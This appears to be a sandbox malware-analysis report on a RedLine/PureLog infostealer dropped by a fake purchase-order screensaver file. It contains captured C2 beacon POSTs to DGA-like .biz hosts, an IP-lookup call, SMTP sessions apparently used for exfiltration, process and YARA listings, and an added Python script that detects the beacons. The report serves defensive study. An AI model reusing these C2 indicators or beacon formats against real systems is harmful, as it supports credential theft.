Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.5 | 51634 | 44.213.104.86 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:20.214735031 CEST | 346 | OUT | POST /brqvg HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: xccjj.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 828
Oct 10, 2024 10:09:20.214760065 CEST | 828 | OUT | Data Raw: 00 f1 0d 5f 27 84 84 af 30 03 00 00 42 92 61 a1 9b 0f 92 36 93 ec 5b e0 b1 ea 53 17 c8 89 da 2c 33 7a 88 fe 09 28 97 e8 1b 24 ad 5c 3e f1 18 55 d7 be 9f 19 2b 38 77 7c 67 d5 30 01 37 27 dd 7f 42 8d ee de de 55 55 d3 fd d2 2e f1 3d 6d fc f6 0c bc
  Data Ascii: _'0Ba6[S,3z($\>U+8w|g07'BUU.=m=Ze6u)Y*BRYwff(&> 1Yq|CJ"*a0$8V/dY1lZ}OLYckQ=M4@X~1s@CwV[B>K%)Z[K"
Oct 10, 2024 10:09:20.693849087 CEST | 407 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 10 Oct 2024 08:09:20 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=14fe589b933bba3d758de093670b79eb|8.46.123.33|1728547760|1728547760|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.5 | 51635 | 18.208.156.248 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:20.610559940 CEST | 349 | OUT | POST /mvljr HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: zyiexezl.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Oct 10, 2024 10:09:20.610559940 CEST | 778 | OUT | Data Raw: 99 e2 19 6c ff 53 1e 98 fe 02 00 00 63 0f 0f 01 bc 8d 24 79 6b d3 8b b8 8d 54 0d 21 7f 28 fb 13 8a 2c c1 ed 94 e1 14 6d 5e de a0 be c9 39 9a ad 1d 77 78 fe 1d 96 dc 3f b7 86 1b bc 53 5e 62 1b 9c 46 3f c0 7b 10 3c 1c d8 81 f0 fa 84 a2 2e a7 ec 18
  Data Ascii: lSc$ykT!(,m^9wx?S^bF?{<.Lp&jA3j!%~/A_.z>YX*6}E/ISA,(Sj#|[f7X^P.d/.,st 1bL8,tr] .?(6A/
Oct 10, 2024 10:09:21.085896969 CEST | 410 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 10 Oct 2024 08:09:21 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=222221af87ab95cb3bfce058f8b422ed|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.5 | 51636 | 44.221.84.105 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:20.716574907 CEST | 353 | OUT | POST /bvbcgrbcs HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: hehckyov.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 828
Oct 10, 2024 10:09:20.716628075 CEST | 828 | OUT | Data Raw: f9 c0 36 df 74 f7 d6 6f 30 03 00 00 c2 a3 d8 12 66 42 8e 42 b1 a9 0d e1 a5 33 8f 93 a7 22 9d 68 d6 59 f1 13 c5 00 ac b7 fc c4 66 0f 8b 1a 4f 66 19 43 19 ba 24 f3 a1 7c 93 62 08 58 a8 5f 2f e6 ab a0 4e 95 e3 d4 a3 1a ed ef 46 1e ce 32 3f a3 8e a6
  Data Ascii: 6to0fBB3"hYfOfC$|bX_/NF2?Nv/4,T\LH]frF^A$IVLKH5}y%kDn]\q;ls<$&PykdGn d:2a/c=U(<XT:jxr=b'bgP
Oct 10, 2024 10:09:21.185419083 CEST | 410 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 10 Oct 2024 08:09:21 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=88af10846c178676334e69bad9724ec7|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.5 | 51637 | 54.244.188.177 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:21.206207991 CEST | 346 | OUT | POST /bgpu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:21.207370043 CEST | 828 | OUT | Data Raw: 53 1d ea 35 b2 d4 90 27 30 03 00 00 69 ef ea 24 c4 32 70 58 4c 06 db 5a 24 bb 87 18 ba 55 7c 52 63 43 51 03 3c 72 55 38 7a bb 4c e1 00 0f e5 c3 5b fd a5 9c ba bf 80 c8 c7 ee 8f 3d 6c c5 d4 73 04 10 f6 13 03 66 5c 37 a3 b6 1c d0 97 4d 77 85 2c 86
Data Ascii: S5'0i$2pXLZ$U|RcCQ<rU8zL[=lsf\7Mw,kpX9*%4vJW%YDa)"jf.MW8+Xi2WV@dK=oI{%I`4L=ru7aG&@x l! W
Oct 10, 2024 10:09:21.956712961 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=da06d71c6d2ab0842264367c47d3dd40|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.5 | 51638 | 44.221.84.105 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:21.346963882 CEST | 349 | OUT | POST /wrjeoyp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:21.346992016 CEST | 778 | OUT | Data Raw: d8 22 1f c8 63 7f 4e a9 fe 02 00 00 89 00 76 1a ac cd fe bf 3d 61 e2 b6 ea d3 6c 40 c3 72 05 1e c7 12 9e ec 23 a4 75 56 83 1c 59 52 dc 23 7a 41 55 50 3e 78 80 53 61 c3 fa 84 f6 93 e0 8f f5 2c 45 f1 c9 ad 60 4e f8 e5 6c 4c fd ea 71 49 dd 13 d2 18
Data Ascii: "cNv=al@r#uVYR#zAUP>xSa,E`NlLqI9{uJo*J<A;4j448/IBcSwt;d:>S,Ow,$lx-3,`n{leKR2E1R{rTL"\}
Oct 10, 2024 10:09:21.822458029 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b56f102d04f8702e1ae05955caa5cd3f|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.26.12.205 | 443 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-10 08:07:24 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-10-10 08:07:24 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 10 Oct 2024 08:07:24 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8d051dd8dc98c345-EWR
2024-10-10 08:07:24 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: 8.46.123.33

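The HTTP sessions above share one shape: a POST of a few hundred opaque bytes to a short, consonant-heavy .biz host with a fixed WeChat/QQBrowser User-Agent, answered by an nginx server that sets a btst cookie carrying the client's public IP and a Unix timestamp, after the same process has already asked api.ipify.org for that public IP. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample, that turns those observations into detection and pivot logic over records constructed from the values shown (only sessions whose header row is fully visible above are included). The record layout, the names given to the cookie's pipe-separated fields, the consonant-run heuristic for DGA-looking hosts, and the check that the little-endian DWORD at offset 8 of each POST body equals the body length minus 12 are our own assumptions and observations from these captures, not documented behaviour of the server or the malware.

```python
import re
from datetime import datetime, timezone

# Constructed sample input: values from the captured sessions, record layout is ours (assumption).
OBSERVED_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)

SESSIONS = [
    {"session": 146, "dst": "54.244.188.177", "dport": 80, "pid": 576,
     "process": r"C:\Users\user\AppData\Local\Temp\microsofts.exe",
     "method": "POST", "path": "/bgpu", "host": "rynmcq.biz", "ua": OBSERVED_UA,
     "body_len": 828, "body_prefix": bytes.fromhex("531dea35b2d4902730030000"),
     "resp_date": "Thu, 10 Oct 2024 08:09:21 GMT",
     "set_cookie": "btst=da06d71c6d2ab0842264367c47d3dd40|8.46.123.33|1728547761|1728547761|0|1|0; "
                   "path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;"},
    {"session": 147, "dst": "44.221.84.105", "dport": 80, "pid": 7120,
     "process": r"C:\Windows\System32\alg.exe",
     "method": "POST", "path": "/wrjeoyp", "host": "banwyw.biz", "ua": OBSERVED_UA,
     "body_len": 778, "body_prefix": bytes.fromhex("d8221fc8637f4ea9fe020000"),
     "resp_date": "Thu, 10 Oct 2024 08:09:21 GMT",
     "set_cookie": "btst=b56f102d04f8702e1ae05955caa5cd3f|8.46.123.33|1728547761|1728547761|0|1|0; "
                   "path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;"},
    {"session": 0, "dst": "104.26.12.205", "dport": 443, "pid": 576,
     "process": r"C:\Users\user\AppData\Local\Temp\microsofts.exe",
     "method": "GET", "path": "/", "host": "api.ipify.org",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0",
     "body_len": 0, "body_prefix": b"", "resp_date": "Thu, 10 Oct 2024 08:07:24 GMT",
     "set_cookie": None, "resp_body": "8.46.123.33"},
]

# token | client IP | epoch | epoch | three small integers (field names are our assumption)
BTST_RE = re.compile(r"btst=([0-9a-f]{32})\|(\d{1,3}(?:\.\d{1,3}){3})\|(\d+)\|(\d+)\|(\d+)\|(\d+)\|(\d+)")


def parse_btst(set_cookie):
    """Split the server-issued btst cookie into its pipe-separated fields, epochs as UTC datetimes."""
    m = BTST_RE.search(set_cookie or "")
    if not m:
        return None
    token, ip, t1, t2, f1, f2, f3 = m.groups()
    return {"token": token, "ip": ip,
            "first_seen": datetime.fromtimestamp(int(t1), tz=timezone.utc),
            "last_seen": datetime.fromtimestamp(int(t2), tz=timezone.utc),
            "flags": (int(f1), int(f2), int(f3))}


def consonant_run(label):
    """Longest run of consecutive consonants (y counted as a consonant)."""
    best = cur = 0
    for ch in label.lower():
        cur = cur + 1 if ch.isalpha() and ch not in "aeiou" else 0
        best = max(best, cur)
    return best


def is_dga_like(host):
    """Crude heuristic: short, purely alphabetic second-level label with an unpronounceable cluster."""
    parts = host.lower().rstrip(".").split(".")
    if len(parts) < 2:
        return False
    label = parts[-2]
    return label.isalpha() and len(label) <= 12 and consonant_run(label) >= 4


def parse_http_date(value):
    return datetime.strptime(value, "%a, %d %b %Y %H:%M:%S GMT").replace(tzinfo=timezone.utc)


def length_field_consistent(s):
    """Observation from these captures only: DWORD at offset 8 == Content-Length - 12."""
    p = s["body_prefix"]
    return len(p) >= 12 and int.from_bytes(p[8:12], "little") == s["body_len"] - 12


def classify(s):
    """Tag a session with the indicators seen in this report."""
    tags = []
    if (s["method"] == "POST" and s["ua"] == OBSERVED_UA and s["dport"] == 80
            and s["body_len"] > 0 and is_dga_like(s["host"])):
        tags.append("dga_beacon_post")
    if s["host"] == "api.ipify.org":
        tags.append("external_ip_lookup")
    if "dga_beacon_post" in tags and s["process"].lower().startswith(r"c:\windows\system32"):
        tags.append("system_binary_beaconing")  # alg.exe making the same beacon as the dropper
    return tags


def cross_check(sessions):
    """Pivot: the IP the C2 echoes in btst must equal the ipify answer, and the cookie epoch
    must match the server's Date header (it does in both captured responses)."""
    public_ip = next((s["resp_body"].strip() for s in sessions
                      if s.get("resp_body") and s["host"] == "api.ipify.org"), None)
    cookie_ips, date_matches = set(), True
    for s in sessions:
        c = parse_btst(s.get("set_cookie"))
        if c:
            cookie_ips.add(c["ip"])
            date_matches &= (c["first_seen"] == parse_http_date(s["resp_date"]))
    return {"public_ip": public_ip, "cookie_ips": cookie_ips, "date_matches": date_matches,
            "ip_matches": bool(public_ip) and cookie_ips == {public_ip}}


if __name__ == "__main__":
    for s in SESSIONS:
        print(s["session"], s["host"], classify(s), length_field_consistent(s))
    print(cross_check(SESSIONS))
```

Run it as a script to list the tags per session. The consonant-run heuristic is deliberately crude and will misfire on legitimate names such as "strengths"; in production, pair it with the fixed User-Agent and the body shape rather than using it alone.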

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 10, 2024 10:07:28.611766100 CEST | 587 | 49712 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:07:28 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Oct 10, 2024 10:07:28.611938000 CEST | 49712 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 172892
Oct 10, 2024 10:07:28.791620016 CEST | 587 | 49712 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Oct 10, 2024 10:07:28.792007923 CEST | 49712 | 587 | 192.168.2.5 | 51.195.88.199 | STARTTLS
Oct 10, 2024 10:07:28.972194910 CEST | 587 | 49712 | 51.195.88.199 | 192.168.2.5 | 220 TLS go ahead
Oct 10, 2024 10:07:32.014480114 CEST | 587 | 49722 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:07:31 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Oct 10, 2024 10:07:32.019426107 CEST | 49722 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 172892
Oct 10, 2024 10:07:32.202223063 CEST | 587 | 49722 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Oct 10, 2024 10:07:32.211447954 CEST | 49722 | 587 | 192.168.2.5 | 51.195.88.199 | STARTTLS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:32.396934986 CEST5874972251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.762428999 CEST5875159051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:09:08 +0000
                                                                                                                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.762562990 CEST51590587192.168.2.551.195.88.199EHLO 172892
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.944554090 CEST5875159051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
                                                                                                                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.944741011 CEST51590587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.127430916 CEST5875159051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.688433886 CEST5875163951.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:09:22 +0000
                                                                                                                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.691416979 CEST51639587192.168.2.551.195.88.199EHLO 172892
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.873665094 CEST5875163951.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
                                                                                                                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.877556086 CEST51639587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.060930967 CEST5875163951.195.88.199192.168.2.5220 TLS go ahead


Target ID: 0
Start time: 04:07:14
Start date: 10/10/2024
Path: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
Imagebase: 0x400000
File size: 6'536'429 bytes
MD5 hash: 2940B15A52C0AAA97DB24E4043FFFFCF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 04:07:16
Start date: 10/10/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
Imagebase: 0x50000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 04:07:16
Start date: 10/10/2024
Path: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
Imagebase: 0x400000
File size: 6'536'429 bytes
MD5 hash: 2940B15A52C0AAA97DB24E4043FFFFCF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 4
Start time: 04:07:19
Start date: 10/10/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
Imagebase: 0x50000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2128865412.0000000006000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.2126128048.0000000005600000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: true

Target ID: 5
Start time: 04:07:20
Start date: 10/10/2024
Path: C:\Users\user\AppData\Local\Temp\microsofts.exe
Wow64 process (32bit): true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\microsofts.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:1B1EC94BDE0A57A4A82BD2F20B2CB7F3
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.2419729495.0000000007240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                                                          Start time:04:07:21
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x10000
                                                                                                                                                                                                                                                                                                          File size:587'776 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:8C8785AC6585CF5C794B74330B3DB88F
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                                                          Start time:04:07:21
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\build.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                                                                                                                          File size:307'712 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:3B6501FEEF6196F24163313A9F27DBFD
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                                                          Start time:04:07:22
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                                                                                                                                                                          File size:231'936 bytes
